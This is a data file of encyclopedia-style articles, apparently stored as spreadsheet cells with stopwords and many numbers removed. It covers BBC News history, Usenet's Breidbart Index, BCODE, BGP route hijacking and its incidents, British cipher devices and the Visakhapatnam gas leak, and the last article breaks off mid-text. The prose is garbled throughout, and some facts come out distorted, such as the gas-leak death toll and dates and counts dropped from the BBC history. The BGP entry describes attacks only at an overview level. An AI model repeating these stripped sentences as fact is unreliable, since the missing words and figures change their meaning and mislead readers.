    <t>news operational business division british broadcasting corporation (bbc) responsible gathering broadcasting news current affairs around world. department world's largest broadcast news organisation generates hours radio television output day, well online news coverage. service maintains foreign news bureaus correspondents around world. fran unsworth director news current affairs since january 2018.in 2019, reported ofcom report spent £136m news period april 2018 march 2019. news' domestic, global online news divisions housed within largest live newsroom europe, broadcasting house central london. parliamentary coverage produced broadcast studios london. through english regions, also regional centres across england national news centres northern ireland, scotland wales. nations english regions produce local news programmes current affairs sport programmes. quasi-autonomous corporation authorised royal charter, making operationally independent government. history early years this london calling calling. here first general news bulletin, copyright reuters, press association, exchange telegraph central news. british broadcasting company broadcast first radio bulletin radio station november 1922. wishing avoid competition, newspaper publishers persuaded government broadcasting news 7:00 force wire service copy instead reporting own. gradually gained right edit copy and, 1934, created news operation. however, could broadcast news world addition news, gaumont british movietone cinema newsreels broadcast service since 1936, producing equivalent television newsreel programme january 1948. weekly children's newsreel inaugurated april 1950, around 350,000 receivers. network began simulcasting radio news television 1946, still picture ben. televised bulletins began july 1954, broadcast leased studios within alexandra palace london.the public's interest television live events stimulated elizabeth ii's coronation 1953. estimated million people viewed programme overtaking radio's audience million first time. those live pictures cameras central london alexandra palace transmission, transmitters opened time event. that year, around million licences held rising three million following year, four half million 1955. 1950s television news, although physically separate radio counterpart, still firmly radio news' control 1950s. correspondents provided reports outlets, first televised bulletin, shown july 1954 television service presented richard baker, involved providing narration off-screen stills shown. this followed customary television newsreel recorded commentary john snagge (and occasions andrew timothy).on-screen newsreaders introduced year later 1955 kenneth kendall (the first appear vision), robert dougall, richard baker–three weeks itn's launch september 1955.mainstream television production started move alexandra palace 1950 larger premises mainly lime grove studios shepherd's bush, west london taking current affairs (then known talks department) first panorama, documentary programme, transmitted november 1953, richard dimbleby becoming anchor 1955.in 1958, hugh carleton greene became head news current affairs. 1960s january 1960, greene became director-general. greene made changes aimed making reporting similar competitor itn, highly rated study groups held greene.a newsroom created alexandra palace, television reporters recruited given opportunity write voice scripts–without cover stories radio too.on june 1960, winton, first female network newsreader, appeared vision. september 1960 start radio news current affairs programme o'clock news.bbc2 started transmission april 1964 began broadcasting show, newsroom.the world one, lunchtime news programme, began october 1965 home service, year news review started television. news review summary week's news, first broadcast sunday, april 1964 harking back weekly newsreel review week, produced 1951, open programming sunday evenings–the difference incarnation subtitles deaf hard-of-hearing. decade electronic caption generation, superimposition ("super") produced paper card, synchronised manually studio news footage, committed tape afternoon, broadcast early evening. thus sundays longer quiet news alexandra palace. programme 1980s using electronic captions, known anchor superseded ceefax subtitling similar teletext format), signing programmes hear (from 1981). sunday september 1967, world this weekend, weekly news current affairs programme, launched home service, soon-to-be radio preparations colour began autumn 1967 thursday march 1968 newsroom bbc2 moved early evening slot, becoming first news programme transmitted colour studio alexandra palace. news review westminster (the latter weekly review parliamentary happenings) "colourised" shortly after. however, much insert material still black white, initially part film coverage shot around london colour reversal film stock, regional many international contributions still black white. colour facilities alexandra palace technically limited next eighteen months, colour quadruplex videotape machine and, eventually plumbicon colour telecines–although news colour service started one. black white national bulletins continued originate studio weekdays, along town around, london regional "opt out" programme broadcast throughout 1960s (and bbc's first regional news programme south east), started replaced nationwide tuesday thursday lime grove studios early september 1969. town around never make move television centre instead became london this week aired mondays fridays only, studios. moved production alexandra palace 1969. television news resumed operations next lunchtime bulletin bbc1 black white television centre, remained march 2013.this move smaller studio better technical facilities allowed newsroom news review replace back projection colour-separation overlay. during 1960s, satellite communication become possible; however, years digital line-store conversion able undertake process seamlessly. 1970s september 1970, first nine o'clock news broadcast television. robert dougall presented first week studio described guardian sort polystyrene padded cell"—the bulletin moved earlier time 20.50 response ratings achieved itn's news ten, introduced three years earlier rival itv. richard baker kenneth kendall presented subsequent weeks, thus echoing first television bulletins mid-1950s. angela rippon became first female news presenter nine o'clock news 1975. work outside news controversial time, appearing morecambe wise christmas show 1976 singing dancing.the first edition john craven's newsround, initially intended short series later renamed newsround, came studio april 1972. afternoon television news bulletins late 1970s broadcast newsroom itself, rather three news studios. newsreader would present camera sitting edge desk; behind staff would seen working busily desks. this period corresponded nine o'clock news next makeover, would background newsroom camera weekday evening. also mid-1970s, late night news bbc2 briefly renamed newsnight, last, programme know today would launched 1980 soon reverted news summary early evening bbc2 news expanded become newsday. news radio change 1970s, radio particular, brought arrival editor peter woon television news implementation broadcasting seventies report. these included introduction correspondents news bulletins previously newsreader would present, well inclusion content gathered preparation process. programmes also added daily schedule, world tonight part plan station become "wholly speech network". newsbeat launched news service radio september 1973.on september 1974, teletext system launched bring news content television screens using text launched. engineers originally began developing system bring news deaf viewers, system expanded. ceefax service became much diverse ceased october 2012: subtitling channels, also gave information weather, flight times film reviews. decade, practice shooting film inserts news broadcasts declining, introduction technology equipment would gradually become less cumbersome bbc's first attempts using philips colour camera backpack base station separate portable sony u-matic recorder latter half decade. 1980s 1980, iranian embassy siege shot electronically television news outside broadcasting team, work reporter kate adie, broadcasting live prince's gate, nominated bafta actuality coverage, time beaten 1980 award.newsnight, news current affairs programme, january 1980, although trade union disagreements meant launch lime grove postponed week. august 1981 moira stuart became first african caribbean female newsreader appear british television. 1982, technology become sufficiently reliable bernard hesketh ikegami camera cover falklands war, coverage "royal television society cameraman year" award bafta nomination first time news relied upon electronic camera, rather film, conflict zone. news bafta actuality coverage, however event become remembered television terms brian hanrahan's reporting coined phrase "i'm allowed many planes joined raid, counted counted back" circumvent restrictions, become cited example good reporting pressure.the first breakfast television programme, breakfast time also launched 1980s, january 1983 lime grove studio weeks rival tv-am. frank bough, selina scott, nick ross helped wake viewers relaxed style presenting.the o'clock news first aired september 1984, eventually becoming watched news programme (however, since 2006 overtaken news ten). october 1984, images millions people starving death ethiopian famine shown michael buerk's o'clock news reports. news crew first document famine, buerk's report october describing biblical famine 20th century" "the closest thing hell earth". news report shocked britain, motivating citizens inundate relief agencies, save children, donations, bring global attention crisis ethiopia. news report also watched geldof, would organise charity single they know it's christmas?" raise money famine relief followed live concert july 1985.starting 1981, gave common theme main news bulletins electronic titles–a computer animated "stripes" forming circle background "bbc news" typescript appearing circle graphics, theme tune consisting brass keyboards. nine used similar (striped) number background replaced blue 1985 1987. 1987, decided re-brand bulletins established individual styles differing titles music, weekend holiday bulletins branded similar style nine, although "stripes" introduction continued used 1989 occasions news bulletin screened running order schedule.in 1987, john birt resurrected practice correspondents working radio introduction bi-media journalism,. 1990s during 1990s, wider range services began offered news, split world service television become world (news current affairs), prime (light entertainment). content 24-hour news channel thus required, followed 1997 launch domestic equivalent news rather bulletins, ongoing reports coverage needed keep channels functioning meant greater emphasis budgeting necessary. 1998, years broadcasting house, radio news operation moved television centre.new technology, provided silicon graphics, came 1993 re-launch main bulletins, creating virtual appeared much larger physically. relaunch also brought bulletins style small changes colouring, titles, music differentiate each. computer generated cut-glass sculpture coat arms centrepiece programme titles large scale corporate rebranding news services 1999. 1999, biggest relaunch occurred, bulletins, world, news news online adopting common style. significant changes gradual adoption corporate image regional news programmes, giving common style across local, national international television news. this also included newyddion, main news programme welsh language channel s4c, produced news wales. 2000s following relaunch news 1999, regional headlines included start news bulletins 2000. english regions however lose five minutes bulletins, headline round-up 18:55. 2000 also nine o'clock news moved later time 22:00. this response moved popular news programme 23:00. briefly returned news following poor ratings head-to-head bbc's o'clock news, bulletin moved 22.30, remained january 2008. retirement 2009 peter sissons departure michael buerk o'clock news changes bulletin presenting team january 2003. o'clock news became double headed george alagiah sophie raworth edwards fiona bruce moved present ten. design featuring projected fictional newsroom backdrop introduced, followed february 2004 programme titles match news news world introduced style presentation december 2003, slightly altered july 2004 mark years television news. individual positions editor o'clock news replaced daytime position november 2005. kevin bakhurst became first controller news replacing position editor. amanda farnsworth became daytime editor craig oliver later named editor o'clock news. bulletins also began simulcast news pooling resources. bulletins received titles design 2006, allow breakfast move main studio first time since 1997. featured barco videowall screens background london skyline used main bulletins originally image cirrus clouds blue breakfast. this later replaced following viewer criticism. studio bore similarities itn-produced news 2004, though uses virtual studio rather actual screens news. also, launch world news today first domestic bulletin focused principally international news. news became part journalism group november 2006 part restructuring bbc. then-director news, helen boaden reported then-deputy director-general head journalism group, mark byford made redundant 2010.on october 2007, mark thompson announced six-year plan, delivering creative future, merging television current affairs department "news programmes" division. thompson's announcement, response billion shortfall funding, would, said, deliver smaller fitter bbc" digital age, cutting payroll and, 2013, selling television centre.the various separate newsrooms television, radio online operations merged single multimedia newsroom. programme making within newsrooms brought together form multimedia programme making department. world service director peter horrocks said changes would achieve efficiency time cost-cutting bbc. blog, wrote using resources across various broadcast media meant fewer stories could covered, following stories, would fewer ways broadcast them.a graphics video playout system introduced production television bulletins january 2007. this coincided structure world news bulletins, editors favouring section devoted analysing news stories reported first news bulletin since o'clock news announced july 2007 following successful trial midlands. summary, lasting seconds, broadcast 20:00 weekdays since december 2007 bears similarities seconds three, also includes headlines various regions weather summary. part long-term cost cutting programme, bulletins renamed news one, respectively april 2008 news renamed news moved studio bulletins television centre. world renamed world news regional news programmes also updated presentation style, designed lambie-nairn.2008 also tri-media introduced across radio, online.the studio moves also meant studio previously used world, closed, operations moved previous studio news studio later refitted match branding, used bbc's local elections european elections coverage early june 2009. 2010s strategy review march 2010, confirmed "the best journalism world" would form five editorial policies, part changes subject public consultation trust approval.after period suspension late 2012, helen boaden ceased director news. april 2013, incoming director-general tony hall named james harding, former editor times london newspaper director news current affairs.from august 2012 march 2013, news operations moved television centre facilities refurbished extended broadcasting house, portland place. move began october 2012, also included world service, moved bush house following expiry bbc's lease. this extension north east, referred "new broadcasting house", includes several state-of-the-art radio television studios centred around 11-storey atrium. move began domestic programme andrew marr show september 2012, concluded move news channel domestic news bulletins march 2013. newsroom houses domestic bulletins programmes television radio, well world service international radio networks world news international television channel. 2020s january 2020 announced news savings target million year 2022, involving staff reductions current 6,000. director news current affairs fran unsworth said would moves toward digital broadcasting, part attract back youth audience, pooling reporters stop separate teams covering news. staff reductions announced july 2020.according annual report december 2021, india largest number people using services world. broadcasting media television news responsible news programmes documentary content bbc's general television channels, well news coverage news channel hours programming corporation's international world news channel. coverage parliament carried behalf millbank studios, though news provides editorial journalistic content. news content also output onto bbc's digital interactive television services button brand, 2012, ceefax teletext system.the music television news programmes introduced 1999 composed david lowe. part re-branding commenced 1999 features 'bbc pips'. general theme used bulletins one, news world local news programmes bbc's nations regions. lowe also responsible music radio one's newsbeat. theme several changes since 1999, latest march 2013.the arabic television news channel launched march 2008, persian-language channel followed january 2009, broadcasting peel wing broadcasting house; include news, analysis, interviews, sports highly cultural programmes world service funded grant-in-aid british foreign office (and television licence). radio radio news produces bulletins bbc's national radio stations provides content local radio stations general news service (gns), bbc-internal news distribution service. news produce bbc's regional news bulletins, produced individually nations regions themselves. world service broadcasts million people english well languages across globe. radio news patron radio academy. online news online bbc's news website. launched november 1997, popular news websites reaching quarter uk's internet users, worldwide, around million global readers every month. website contains international news coverage well entertainment, sport, science, political news.mobile apps android, windows phone systems provided since 2010.many television radio programmes also available view iplayer sounds services. news channel also available view hours day, video radio clips also available within online news articles.in october 2019, news online launched mirror dark anonymity network effort circumvent censorship. opinions political commercial independence required charter free political commercial influence answers viewers listeners. this political objectivity sometimes questioned. instance, daily telegraph august 2005) carried letter defector oleg gordievsky, referring "the service". books written subject, including anti-bbc works like truth betrayed west truth twisters richard deacon. accused bias conservative mps.the bbc's editorial guidelines politics public policy state whilst "the voices opinions opposition parties must routinely aired challenged", "the government often primary source news".the regularly accused government bias favour opposition and, opposition, bias favour government. similarly, times war, often accused government, strong supporters british military campaigns, overly sympathetic view enemy. edition newsnight start falklands 1982 described "almost treasonable" john page, objected peter snow saying believe british".during first gulf war, critics took using satirical name "baghdad broadcasting corporation". during kosovo war, labelled "belgrade broadcasting corporation" (suggesting favouritism towards yugoslavia government ethnic albanian rebels) british ministers, although slobodan milosević (then president) claimed bbc's coverage biased nation.conversely, style anti-establishment united kingdom oppose foreign wars accused pro-establishment bias refusing give outlet "anti-war" voices. following 2003 invasion iraq, study cardiff university school journalism reporting found nine references weapons mass destruction assumed iraq possessed them, questioned assumption. also found that, main british broadcasters covering war, likely british government military source. also least likely independent sources, like cross, critical war. when came reporting iraqi casualties, study found fewer reports three main channels. report's author, justin lewis, wrote "far revealing anti-war bbc, findings tend give credence criticised sympathetic government coverage. either way, clear accusation anti-war bias fails stand serious sustained analysis."prominent appointments constantly assessed british media political establishment signs political bias. appointment greg dyke director-general highlighted press sources dyke labour party member former activist, well friend tony blair. bbc's former political editor, nick robinson, years chairman young conservatives did, result, attract informal criticism former labour government, predecessor andrew marr faced similar claims right editor independent, liberal-leaning newspaper, appointment 2000. mark thompson, former director-general bbc, admitted organisation biased "towards left" past. said, joined years ago, was, much current affairs, terms people's personal politics, quite vocal, massive bias left". added, "the organization struggle impartiality. completely different generation. there much less overt tribalism among young journalists work bbc." historian mark curtis finds news resembles "straightforward state propaganda organ" provides "critical support [british western] elite's promotion foreign policy", 2003 aggression iraq. says militant nationalism "not even subtle", and, citing glasgow university, says news chief example "manufactured production ideology."following referendum 2016, critics suggested biased favour leaving instance, 2018, received complaints people took issue sufficiently covering anti-brexit marches whilst giving smaller-scale events hosted former ukip leader nigel farage airtime. hand, poll released yougov showed people voted leave thought 'actively anti-brexit' compared kinds voters think pro-brexit. india 2008, hindi criticised indian outlets referring terrorists carried november 2008 mumbai attacks "gunmen". response added prior criticism indian commentators suggesting indophobic bias. march 2015, hindi criticised airing documentary interviewing rapists india. spite ordered indian high court, still aired documentary. hutton inquiry news centre political controversy following 2003 invasion iraq. three news reports (andrew gilligan's today, gavin hewitt's o'clock news another newsnight) quoted anonymous source stated british government (particularly prime minister's office) embellished september dossier misleading exaggerations iraq's weapons mass destruction capabilities. government denounced reports accused corporation poor journalism. subsequent weeks corporation stood report, saying reliable source. following intense media speculation, david kelly named press source gilligan's story july 2003. kelly found dead, suicide, field close home early july. inquiry lord hutton announced british government following investigate circumstances leading kelly's death, concluding "dr. kelly took life."in report january 2004, lord hutton concluded gilligan's original accusation "unfounded" bbc's editorial management processes "defective". particular, specifically criticised chain management caused defend story. director news, richard sambrook, report said, accepted gilligan's word story accurate spite notes incomplete. davies told board governors happy story told prime minister satisfactory internal inquiry taken place. board governors, chairman's, gavyn davies, guidance, accepted investigation government's complaints unnecessary. because criticism hutton report, davies resigned publication. news faced important test, reporting publication report, common consent board governors) managed "independently, impartially honestly". davies' resignation followed resignation director general, greg dyke, following day, resignation gilligan january. while undoubtedly traumatic experience corporation, poll april 2003 indicated sustained position best trusted provider news. israeli–palestinian conflict faced accusations holding anti-israel anti-palestine bias. douglas davis, london correspondent jerusalem post, described bbc's coverage arab–israeli conflict relentless, one-dimensional portrayal israel demonic, criminal state israelis brutal oppressors [which] bears hallmarks concerted campaign vilification that, wittingly not, effect delegitimising jewish state pumping oxygen dark european hatred dared speak name past half-century.". however large independent studies, conducted loughborough university glasgow university's media group concluded israeli perspectives given greater coverage.critics argue balen report proves systematic bias israel headline news programming. daily mail daily telegraph criticised spending hundreds thousands british payers' pounds preventing report released public.jeremy bowen, middle east editor world news, singled specifically bias trust concluded violated "bbc guidelines accuracy impartiality."an independent panel appointed trust 2006 review impartiality bbc's coverage israeli–palestinian conflict. panel's assessment "apart individual lapses, little suggest deliberate systematic bias." while noting "commitment fair accurate impartial" praising much bbc's coverage independent panel concluded "that output consistently give full fair account conflict. ways picture incomplete and, sense, misleading." notes that, "the failure convey adequately disparity israeli palestinian experience, [reflects] fact side control lives occupation". writing financial times, philip stephens, panellists, later accused bbc's director-general, mark thompson, misrepresenting panel's conclusions. opined sense news reporting also lost iron-clad commitment objectivity necessary respect democratic process. right, bbc, too, lost". mark thompson published rebuttal next day.the description correspondent reporting funeral yassir arafat left tears eyes questions impartiality, particularly martin walker guest opinion piece times, picked apparent case fayad shamala, arabic service correspondent, told hamas rally 2001, journalists gaza "waging campaign shoulder shoulder together palestinian people."walker argues independent inquiry flawed reasons. firstly, time period conducted (august 2005 january 2006) surrounded israeli withdrawal gaza ariel sharon's stroke, produced positive coverage usual. furthermore, wrote, inquiry looked bbc's domestic coverage, excluded output world service world.tom gross accused glorifying hamas suicide bombers, condemned policy inviting guests jenny tonge paulin compared israeli soldiers nazis. writing bbc, paulin said israeli soldiers "shot dead" like hitler's s.s, said could "understand suicide bombers feel." according gross, paulin tonge continue invited regular guests, among frequent contributors widely screened arts programme.the also faced criticism airing disasters emergency committee appeal palestinians suffered gaza 22-day late 2008 early 2009. most major broadcasters appeal, rival news not.british journalist julie burchill accused creating "climate fear" british jews "excessive coverage" israel compared nations. partners share video segments reporters needed producing newscasts. showing world news tonight david muir however, july 2017, announced partnership news allows organisations share video, editorial content, additional newsgathering resources york, london, washington around world.bbc news subscribes wire services leading international agencies including media (formerly press association), reuters, agence france-presse. april 2017, dropped associated press favour enhanced service afp. view foreign governments news reporters broadcasts past banned several countries primarily reporting unfavourable ruling government. example, correspondents banned former apartheid régime south africa. banned zimbabwe mugabe eight years terrorist organisation allowed operate year 2008 elections.the banned burma (officially myanmar) coverage commentary anti-government protests september 2007. lifted four years later september 2011. other cases included uzbekistan, china, pakistan. persian, bbc's persian language news site, blocked iranian internet 2006. news website made available china march 2008, october 2014, blocked again.in june 2015, rwandan government placed indefinite broadcasts following airing controversial documentary regarding 1994 rwandan genocide, rwanda's untold story, broadcast bbc2 october 2014. uk's foreign office recognised "the hurt caused rwanda parts documentary".in february 2017, reporters well daily mail, york times, politico, cnn, others) denied access united states white house briefing.in 2017, india banned period years covering national parks sanctuaries india. following withdrawal cgtn's broadcaster licence february 2021 ofcom, china banned news airing china. also newsreaders journalists television news programmes list newsreaders reporters list former newsreaders journalists references external links official website official site: bbcnewsd73hkzno2ini43t4gblxvycyac5aw4gnv7t2rccijh7745uqd.onion (accessing link help) news focus: photos past decades guardian</t>
  </si>
  <si>
    <t>Breidbart Index</t>
  </si>
  <si>
    <t>breidbart index, developed seth breidbart, significant cancel index usenet. cancel index measures dissemination intensity substantively identical articles. index exceeds threshold articles called newsgroup spam. they removed using third party cancel controls. cancel index crossposting posting message multiple newsgroups multiposting posting contents multiple timesthe principal idea breidbart-index give methods different weight. with crossposted message less data needs transferred stored. excessive crossposts (ecp) also likely beginner's error, excessive multiposts (emp) suggest deliberate usage special software. crucial issue categorizing multiple articles substantively identical. this includes byte-for-byte identical messages otherwise identical postings minimally customized group appears advertising service articles consist solely signature articles consist inclusions user's postings, otherwise identical breidbart index (bi) breidbart index articles defined square root number newsgroups article cross posted. formula {\displaystyle {\mbox{bi}}=\sum _{k=1}^{m}{\sqrt {n_{k}}}} exampletwo copies posting made, groups, {\displaystyle {\sqrt {9}}+{\sqrt {16}}=3+4=7} breidbart-index, version (bi2) aggressive criterion, breidbart index version proposed. defined square root plus divided two. single message would need crossposted newsgroups breach threshold formula {\displaystyle {\mbox{bi2}}=\sum _{k=1}^{m}{\frac {n_{k}+{\sqrt {n_{k}}}}{2}}} exampletwo copies posting made, groups, {\displaystyle {\frac {{\sqrt {9}}+{\sqrt {16}}+9+16}{2}}={\frac {3+4+9+16}{2}}={\frac {32}{2}}=16} skirvin-breidbart index (sbi, bi3) name skirvin-breidbart index abbreviation mentioned spam thresholds faq. however, hierarchy nl.* index called bi3.the calculated similar adds number groups followup-to: present) instead number groups newsgroups:. this encourages followup-to:. exampletwo posts contain text. crossposted groups. crossposted four groups followup-to:. {\displaystyle {\frac {{\sqrt {9}}+{\sqrt {16}}+9+4}{2}}={\frac {3+4+9+4}{2}}={\frac {20}{2}}=10} bi30 hierarchy de.* breidbart index used time range seven days instead this denoted abbreviation bi7.in hierarchy hamster.de.* breidbart index used time range days instead this denoted abbreviation bi30. cancel index at.* this defined group at.usenet.cancel-reports. term used call votes "cancel-index". unofficial abbreviations aci. single post equals plus number groups post sent index multiple posts indices individual posts. thresholds according 1036 author target message administrator site injected message allowed send cancel. according spam thresholds 20/45 applies hierarchies. series articles limit canceled everyone. hierarchies alternative (stricter) limits defined public vote. cancel messages derivatives thereof allowed within free.*.in fact cancel message non-binding request remove certain article. news server operators freely decide implement conflicting policies. references</t>
  </si>
  <si>
    <t>BCODE</t>
  </si>
  <si>
    <t>bcode identifier sent mobile phone/device used ticket/voucher/identification type token. bcode message read electronically screen mobile device. bcodes sent text message, standard received devices. bcodes many uses advertising, loyalty programs, promotions, ticketing more. history bcode developed australian company 2003-2005. bcode technology bcode simple text message looks something like this: this text message read screen mobile phone/device decoded unique token this used supply consumer unique experience. references external links bcode</t>
  </si>
  <si>
    <t>BGP hijacking</t>
  </si>
  <si>
    <t>hijacking (sometimes referred prefix hijacking, route hijacking hijacking) illegitimate takeover groups addresses corrupting internet routing tables maintained using border gateway protocol (bgp). background internet global network enabling connected host, identified unique address, talk other, anywhere world. this achieved passing data router another, repeatedly moving packet closer destination, hopefully delivered. this, router must regularly supplied up-to-date routing tables. global level, individual addresses grouped together prefixes. these prefixes originated, owned, autonomous system (as) routing tables ases maintained using border gateway protocol (bgp). group networks operate single external routing policy known autonomous system. example, sprint, verizon, at&amp;t each unique identifier number. standard routing protocol used exchange information routing autonomous systems. each uses advertise prefixes deliver traffic example, network prefix 192.0.2.0/24 inside 64496, advertise provider(s) and/or peer(s) deliver traffic destined 192.0.2.0/24. although security extensions available bgp, third-party route resources exist validating routes, default protocol designed trust route announcements sent peers, isps rigorously enforce checks sessions. mechanism hijacking occur deliberately accident several ways: announces originates prefix actually originate. announces specific prefix announced true originating announces route traffic hijacked shorter route already available, regardless whether route actually exists.common ways disruption normal routing network: packets forwarded towards wrong part network either enter endless loop (and discarded), found mercy offending typically isps filter traffic, allowing advertisements downstream networks contain valid space. however, history hijacking incidents shows always case. resource public infrastructure (rpki) designed authenticate route origins cryptographic certificate chains demonstrating address block range ownership, widely deployed yet. once deployed, hijacking errant issues origin (via accident intent) detectable filterable. hijacking sometimes used malicious users obtain addresses spamming distributed denial-of-service (ddos) attack. when router promulgates flawed routing information, whether action intentional accidental, defined internet engineering task force (ietf) 7908 "route leak". such leaks described "the propagation routing announcement(s) beyond intended scope. that announcement autonomous system (as) learned route another violation intended policies receiver, sender, and/or ases along preceding path." such leaks possible long-standing "…systemic vulnerability border gateway protocol routing system…" hijacking transit-as problems like reset attack, session hijacking involves intrusion ongoing session, i.e., attacker successfully masquerades peers session, requires information needed accomplish reset attack. difference session hijacking attack designed achieve simply bringing session peers. example, objective change routes used peer, order facilitate eavesdropping, black holing, traffic analysis. default ebgp peers attempt routes received another peer device's routing table attempt advertise nearly routes ebgp peers. this problem multi-homed organizations inadvertently advertise prefixes learned another, causing customer become new, best-path prefixes question. example, customer cisco router peering at&amp;t verizon using filtering automatically attempt link major carriers, could cause providers prefer sending traffic customer perhaps t1), instead using high-speed dedicated links. this problem affect others peer providers also cause prefer misconfigured link. reality, problem hardly ever occurs large isps, isps tend restrict customer advertise. however, filtering customer advertisements allow errant information advertised global routing table affect even large tier-1 providers. concept hijacking revolves around locating filtering advertisements (intentionally otherwise) locating whose internal isp-to-isp session susceptible man-in-the-middle attack. once located, attacker potentially advertise prefix want, causing traffic diverted real source towards attacker. this done either overload attacker infiltrated, perform impersonation attack entity whose prefix advertised. uncommon attacker cause serious outages, including complete loss connectivity. early 2008, least eight universities traffic diverted indonesia minutes morning attack kept mostly quiet involved. also, february 2008, large portion youtube's address space redirected pakistan decided block access site inside country, accidentally blackholed route global table. while filtering md5/ttl protection already available implementations (thus preventing source attacks), problem stems concept isps rarely ever filter advertisements isps, common efficient determine list permissible prefixes originate. penalty allowing errant information advertised range simple filtering other/larger isps complete shutdown session neighboring (causing isps cease peering), repeated problems often permanent termination peering agreements. also noteworthy even causing major provider block shutdown smaller, problematic provider, global table often reconfigure reroute traffic available routes peers take action, errant fixes problem source. useful offshoot concept called anycasting frequently used root servers allow multiple servers address, providing redundancy layer protection attacks without publishing hundreds server addresses. difference situation point advertising prefix actually access real data (dns case) responds correctly user requests. public incidents april 1997: 7007 incident" december 2004: ttnet turkey hijacks internet 2005: google's 2005 outage january 2006: edison communications hijacks chunk internet february 2008: pakistan's attempt block youtube access within country takes youtube entirely. november 2008: brazilian ctbc companhia telecomunicações brasil central leaked internal table global table. lasted minutes. although, detected ripe route server propagated, affecting practically customers others. april 2010: chinese hijacks internet july 2013: hacking team aided raggruppamento operativo speciale (ros special operations group italian national military police) regaining access remote access tool (rat) clients abruptly lost access control servers santrex ipv4 prefix 46.166.163.0/24 became permanently unreachable. hacking team worked italian network operator aruba s.p.a. (as31034) prefix announced order regain access control server. february, 2014: canadian used redirect data isps. incidents february hacker redirected traffic roughly seconds session. bitcoin crypto-currency mining operations targeted currency stolen. january 2017: iranian pornography censorship. april 2017: russian telecommunication company rostelecom (as12389) originated prefixes numerous autonomous systems. hijacked prefixes belonged financial institutions (most notably mastercard visa), telecom companies, variety organizations. even though possible hijacking lasted minutes still clear traffic intercepted modified. december 2017: eighty high-traffic prefixes normally announced google, apple, facebook, microsoft, twitch, communications, riot games, others, announced russian dv-link-as (as39523). april 2018: roughly 1300 addresses within amazon services space, dedicated amazon route hijacked enet customer thereof), columbus, ohio. several peering partners, hurricane electric, blindly propagated announcements. july 2018: iran telecommunication company (as58224) originated prefixes telegram messenger. november 2018: us-based china telecom site originated google addresses. 2019: traffic public taiwan network information center (twnic) rerouted entity brazil (as268869). june 2019: large european mobile traffic rerouted china telecom (as4134) "this route leak began [swiss] safehost (as21217) announced forty-thousand ipv4 routes learned peers providers provider china telecom 4134). turn, china telecom accepted routes propagated them…" february 2021: initially reported cablevision mexico (as28548) leaked prefixes creating conflicts asns countries, main impact mexico. data isolario dump suggested 7,200 ipv4 prefixes announced leaked as1874 impacting 1290 asns countries. april 2021: large routing leak india: 30,000 prefixes hijacked vodafone idea (as55410) causing spike inbound traffic. prefixes around globe mostly including google, microsoft, akamai, cloudflare. february 2022: attackers hijacked prefixes belonged south korean cryptocurrency platform, issued certificate domain zerossl serve malicious javascript file, stealing $1.9 million worth cryptocurrency. also bogon filtering border gateway protocol resource public infrastructure internet outage references external links qrator.radar: real-time connectivity security monitoring system. bgpmon.net: specific monitoring system detect prefix hijacks, route leakage instability. cyclops: network audit tool (prefix hijack, route leakage) ucla netviews: real time topology visualization hijacking detection tool university memphis. as-cred: service reputation-based trust management real-time alert (prefix hijacking, unstable prefix announcement), inter-domain routing university pennsylvania. safe yet?: list isps implement resource public infrastructure (rpki).</t>
  </si>
  <si>
    <t>BID 150</t>
  </si>
  <si>
    <t>british voice encryption device used (for example) larkspur radio system sets. means 'british inter departmental'. these systems equipment types generally used single governmental agency department. authority bid's communications-electronics security group (cesg) part government communications headquarters (gchq). bid/150 speech encryption generator single channel device british army larkspur radio system. this first combat secure speech system whose punch cards within device. examples bid/150 display royal signals museum, blandford forum. first used operationally 15th signal regiment aden crisis late 1960s widely used battalion level corps headquarters. remained early 1980s. secure mode analogue speech signal digitized, encrypted combination digital generated bid/150; digital stream transmitter, pulse modulate carrier. receive, sequence reversed. good radio performance needed reliable secure working. end, vehicles carrying c42-dm-bid/150 system issued 27-foot mast elevated antenna. carried 'goodman box', check signal strengths antenna performance. operator searching set-up performance drills strictly followed. external links crypto machine website royal signals museum, blandford forum</t>
  </si>
  <si>
    <t>BID 610</t>
  </si>
  <si>
    <t>alvis british cipher machine used british canadian governments. first fully transistorised full-duplex online cipher machine used british army. introduced 1960s. references external links alvis cypher machine liedra.net</t>
  </si>
  <si>
    <t>When Technology Fails</t>
  </si>
  <si>
    <t>when technology fails, edited neil schlager, collection case studies significant technological disasters, accidents, failures 20th century. published 1994 gale research, inc. referenced books york public library 1995. book updated re-released 2005. book consists 1,000- 1,500-word entries, arranged subject, discuss background, timeline, impact event. each entry written journalists, engineers, researchers, provides cursory overview, rather in-depth technological analysis. entries supplemented bibliographies, black-and-white photographs, charts, print media. also normal accidents megaprojects risk northeast blackout 2003 brittle power fukushima nuclear disaster references external links https://openlibrary.org/books/ol1430475m/when_technology_fails</t>
  </si>
  <si>
    <t>BID 770</t>
  </si>
  <si>
    <t>british-built electronic cryptography device, codenamed topic. also used canada's foreign service codename tenec. topic brought service 1977, became obsolete 1995. topic used protect telegraph traffic, replaced earlier mechanical system called rockex. could operated off-line modes. weighing machine used diode–transistor logic instead single transistors. external links jerry proc's page</t>
  </si>
  <si>
    <t>Visakhapatnam gas leak</t>
  </si>
  <si>
    <t>visakhapatnam leak, also referred vizag leak, industrial accident occurred polymers chemical plant venkatapuram village gopalapatnam neighbourhood, located outskirts visakhapatnam, andhra pradesh, india, early morning 2020. resulting vapour cloud spread radius around (1.86 mi), affecting nearby areas villages. national disaster response force (ndrf), death toll 1,000 people became sick exposed gas. preliminary investigations concluded accident likely result insufficient maintenance units storing styrene monomer, improper storage, operation errors. government andhra pradesh announced gratia crore (us$130,000 €120,000) family deceased, well funds injured. budget crore (us$3.8 million €3.7 million) allocated compensation affected. background chemical plant venkatapuram village originally established 1961 hindustan polymers. 1978, merged mcdowell holdings, subsidiary united breweries group. 1997, acquired south korean company chem, renamed company polymers india. chem expanded operations polymers plant five times 2006 2018. plant manufactures polystyrene, co-polymer products, engineering plastic compounds. lack environment clearance south korean parent company, chem, said 2019 affidavit, part application environment clearance, company legitimate environmental clearance issued ministry environment, forest climate change (moefcc), receiving environmental impact assessment (eia), substantiating produced quantity continuing operations. according notification (amendment) 2006 environment protection 1986, chemicals india, part petrochemical industry, falls category clearance moefcc every time expanded plant brought change manufactured product november 2006. chem expanded operations polymers plant five times 2006 2018 without clearance. according 2019 affidavit, since 1997, instead operating state permits required starting business renewals every five years.however, chem spokesperson choi sang-kyu told associated press (ap) company followed indian laws operated based officials' guidelines state federal level. said affidavit pledge compliance law, rather admission violating law. after 2006 notification, choi said company consulted ministry told clearance required. however, environment secretary mishra told plant would requirement clearance 2006, clearance imperative expansion production change thereafter.lg polymers 